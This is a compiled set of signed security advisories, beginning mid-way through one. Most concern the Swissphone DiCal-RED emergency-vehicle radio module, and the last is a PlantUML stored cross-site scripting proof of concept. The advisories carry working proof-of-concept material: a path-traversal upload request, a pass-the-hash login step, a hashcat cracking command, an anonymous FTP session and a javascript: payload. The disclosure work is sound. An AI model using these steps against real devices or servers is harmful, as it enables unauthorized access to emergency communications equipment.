/cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1<br /> Host: 192.0.2.1<br /> Content-Length: 190<br /> Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5<br /> [...]<br /> Cookie: QSESSIONID=[...]<br /> <br /> ------WebKitFormBoundarynMcoPJ7jKTghQbK5<br /> Content-Disposition: form-data; name="binary"; filename="../poc.txt"<br /> Content-Type: text/plain<br /> <br /> PoC<br /> <br /> ------WebKitFormBoundarynMcoPJ7jKTghQbK5--<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-039<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd<br />i5Z0/Q//URU2aC1Di8bK/CntBDFfjMk+fD0nXKwo7C/GSOy41y7xBlz9e9UzJKPP<br />fI7fa8RQkbZDlDzpTQHXbvpSocbahWIM62B+c7uGm1EGZyejn7IpJUSbhRZHzKqM<br />sNukpHq10p/AA6BJn4baFgfFIdV+HzXPAm3bkxovL3pUmMYVgFsfzuzpZ3wOqKbn<br />M276mEmsBDG2Yi7HqWetqtYAjb35DVokrug+uT8DDe3SSE9V16iqo8EqMqMBXD7L<br />aCvVnnVl1ElqJSsIyClyXLoKLcWbBN4zAUlb6f90PEeUtNt5/qhRiLDzprum8BYo<br />7DhMz8MwOTTijNKRcYpVkOfPg1htmdUe5JqElktGcfNDj5YvU4KzG89srigHreJP<br />yIVM+J0VX4fQ28cjKTS/qyXOAeIqJq//3/vbsgA3YNlP+IPBZYav8//HEPJD1PiD<br />fBlwhQ7skn/EaCBi8EMatu7/xymA34rnTmmqS5+MCViWcTTB2+fF7H2xhZl1biHD<br />DcVMVGgbNAdRIYFkJAh6qg0sXd1VOb8etAhFRQmMt5MeSK+ErbAIiaWTot2wwvbS<br />jbTsEG+VL0HTIfEI/utghGDB+044hJceEyaqRJ/qq/3Zx1C13ZsKLPeXZaMoeEWM<br />1nYLOJFL/R/i+UjFsFzxDG/IcbionJYOTvULa4vPafdZQ6Yol80=<br />=BeZD<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-038<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Use of Password Hash Instead of Password for Authentication (CWE-836)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36439<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to the use of a password hash instead of a password for authentication,<br />the device is vulnerable to unauthorized access to administrative<br />functionality.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides an administrative web interface that requests the<br />administrative system password before it can be used. Instead of submitting<br />the user-supplied password, its MD5 hash is calculated on the client side<br />and submitted.<br />An attacker who knows the hash of the correct password but not the password<br />itself can simply replace the value of the password URL parameter with the<br />correct hash and subsequently gain full access to the administrative web<br />interface.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Access the device's web interface and log in with an arbitrary password.<br />2. Use a local proxy or browser plug-in to intercept the HTTP requests.<br /> One of them looks like this:<br />http://192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=validatepassword&password=2ab96390c7dbe3439de74d0c9b0b1767<br />3. Replace the value of the password parameter with the hash of the correct<br /> device password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-038<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-038.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd<br />i5bDcg//QqSSeXrwj8+F+lGJBRgcwK8Qf7LWK3IWovj+DSKR0II7n6voq+ZG2LPS<br />BpO8EEjhSbWDkGHCBgyuvZ8NoXu3LSX3mAVpAvrK+Rq8rPXE1dTxINAilq9Z8Q0r<br />bjwybUrN6T0W7uc/Z9VtQiMH1hY1fbkcRbp0RWtzdo0cIjhKs7aBWf1bNIdDaiX8<br />Mnyc/5nM65IXPjUdGSFvgNDcUOxG7IRlrPvHncjeiJge8JVqSJUiD410ZpvcBS8x<br />6SPBwl+OqWxF5mnmP2iOixDVMyiZl9AlzaUMA4BISsTRrkSugJmOJTwZGusCZIlZ<br />KjikGfjvtIIjC31pqzBuX9uwWT59YBlA4zoNl2gHBzFy0zwZKVSIX2IxhsmqfHci<br />XthTlkjX+sY8u9XiMKZU6hYAwUOGFo9+i6L34X/XykztFmwjUluOdOQDzXVoA0wm<br />mZ1OEAYOdccr/BakIhTJQONKGzGErZWEUGBcyHOccw4AYQwn19bR7kGXqXZ6/DQB<br />w0od4XFWuWVVO/OC6HPCH+vsrjFCze4pPAuGbzKzuPc3bBxWp/gYS5znKFGMwyTf<br />wOGCi3YKfPzqze4yC46wbviDfjStEe7ljbAVkuy4r8XLh5MPMLCb/3YPgbhdiqUk<br />X1OuQWRmHGp9WnzB2uYfK/+EKZNPthT3gDqZoyGWlISm+6C22no=<br />=Y5jL<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-037<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Use of Password Hash With Insufficient Computational Effort (CWE-916)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36440<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to a weak password hashing function, the device password is vulnerable to<br />offline brute-force attacks in order to recover the password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device password is stored in the file /etc/deviceconfig as a plain MD5<br />hash, i.e. without any salt or computational cost function.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />root@DiCal-RED:~# cat /etc/deviceconfig<br />PasswordActive=1<br />PasswordHash="2ab96390c7dbe3439de74d0c9b0b1767"<br />[...]<br /><br />$ hashcat -m 0 -a 3 2ab96390c7dbe3439de74d0c9b0b1767 ?l?l?l?l?l?l?d<br />[...]<br />2ab96390c7dbe3439de74d0c9b0b1767:hunter2<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-037<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-037.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd<br />i5YLLw/+KOVlJj9SE7BMWl9H9zO9YcNZPUvuC62/iAtn82r0bOTQAUjx3eSzxx01<br />BGqHEVozMOb4PHC1hTPGp+WHMaFNlcLgiyciFhckh4PpeIwtCCccg3+8BlJRmVPb<br />pO+IWo16KcW/fYnqpu5fvHeKnC7UkauWBJiC5a72kjBqJeKreHjTJ3+lAOuMp5nt<br />wTJAEVvlog+MNJzXipMTDzYlaw6YrMr5ukgou0iDKKNJpwMBwJpga0IvJGmubNOU<br />YchVnsZOC7cXWqPBRFpNzKJifMZJ2rWPzoryIniR+ZdJn/M/wXr4IKZZJ0Oag/UT<br />li1LdUlNby7QnPCB9T0TfAhS3uGn9tSulPG51Ei9COuKFcpGWqEBM+NZ5QHy/+7o<br />6uo8tHV34XV4ztsWWHp6Mjd9qDI/7iPFsSR4k+Zio5/5rPqOfhp2LuBFfnuLCuqY<br />RLZnZ+eDuyUk4fsDLPP/2mRjfVf9+dskYBVqGbgjzNvgb2teTBxD3t31cdgyRNc7<br />LurHmE4h+h+qLT78E2i/iuRyvZFzAQ6miDNgFqDoTrp9XENtXSicmy0ABMPGMjCw<br />jg0dzFT4AA7zhNN0HuPNX2fE0+dmy5g9t8HdNFJeG52uTMs6/CYGlu573oErlUru<br />lr2Y2f3O06EHFnrR05OVM4TXuQF5VF5lHY/WmTCsOTWOYED2pjg=<br />=tMX8<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-036<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Missing Authentication for Critical Function (CWE-306)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36443<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to anonymous FTP access, the device is vulnerable to the disclosure of<br />sensitive information, such as the device password's hash.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides an FTP service on TCP port 21. This service allows<br />anonymous access, i.e. logging in as the user "anonymous" with an arbitrary<br />password. Anonymous users get read access to the whole file system of the<br />device, including files that contain sensitive configuration information, such<br />as /etc/deviceconfig.<br />The respective process on the system runs as the system user "ftp". Therefore,<br />a few files with restrictive permissions are not accessible via FTP.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />$ ftp <IP or hostname><br />220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1]<br />500 OPTS UTF8 not understood<br />User (<IP or hostname>:(none)): anonymous<br />331 Anonymous login ok, send your complete email address as your password<br />Password:<br />230 Anonymous access granted, restrictions apply<br />ftp> ls<br />200 PORT command successful<br />150 Opening ASCII mode data connection for file list<br />usb2<br />mnt<br />etc<br />dev<br />proc<br />lib<br />home<br />htdocs<br />sbin<br />media<br />ram<br />linuxrc<br />root<br />gprscfg<br />run<br />usr<br />usb1<br />lost+found<br />bin<br />tmp<br />sys<br />var<br />226 Transfer complete<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-036<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd<br />i5bypA/8CtRcEEdS48fPfKJRheIMG5qdEBv3Rq8rljg+PqkoqeL6G6ztRYQkbcaX<br />Tl1+ajtOW3rPM9i9AExV6UIPG9IO+IY0v4vto1uHALZ7gkVeOe0bQXov0Lgbwr/y<br />dWrpv4tMFNo48pDZEU9bl1+fb6VtPoiF2QPyjvylpiMe1ONrUpxqkd5HsNkAw2V7<br />90X+Ma/+awXITwwTL/7iX6ryCvSZjN72wd1m1S9tcrQ0+/dUnoIZCDWNnLMSroUq<br />GoqxotzUD0ehDxSrKUG4eXY1yGjJcIRSjAspYfNCdOnzHmW3XgrgCkFoDHnB8RTv<br />bhL+uwxu99eQMkyrhPBZ34hGmRjIDpywbnrG6iX3+1pBiIslQQ/u3BYDdpYx3MJE<br />Rv0HX+qrHQxPFphb+ZvPO/LHJApwgmjvS81OutAnbAblOnBpapjcBN729Sd5B0Sn<br />x+MdUZOGQGEPKCXkBnHh7Dpt4zUlM8lmFALNhk2dW+eioZhC3RaYXc8GmcB7QyFo<br />OjyCcsP1yMjN2ITfw1Jg2NfPQ/o05RoWRAxa/zDepW4T4wDGguTyZCNdxsHAH3bV<br />2BtVF+jLOBhlf3/63RCzrRbiOIwKv6qkjjp5ymWwuALFaklpcjzFbx1Rwv9cl0Wy<br />8wbJBa6BgJOcAO0ODR+GyPCn79ZhvY6w9SqmXM9rWcVQb3Rz1Yk=<br />=lCcl<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)<br />#Date: 23/08/2024<br />#Exploit Author: Hosein Vita<br />#Vendor Homepage: https://plantuml.com/<br />#Version: 1.2024.6<br />#Tested on: Linux<br /><br /><br />Description:<br />This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.<br /><br />Proof of Concept:<br />plantuml<br />Copy code<br />@startuml<br />digraph G {<br /> graph [bgcolor="white"];<br /> node [shape=box, style="rounded,filled", color="white"];<br /> heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];<br />}<br />@enduml<br />Alternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:<br /><br />Copy code<br />PK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_V<br />This proof-of-concept remains stored and can be shared as a link with potential victims.<br /></code></pre>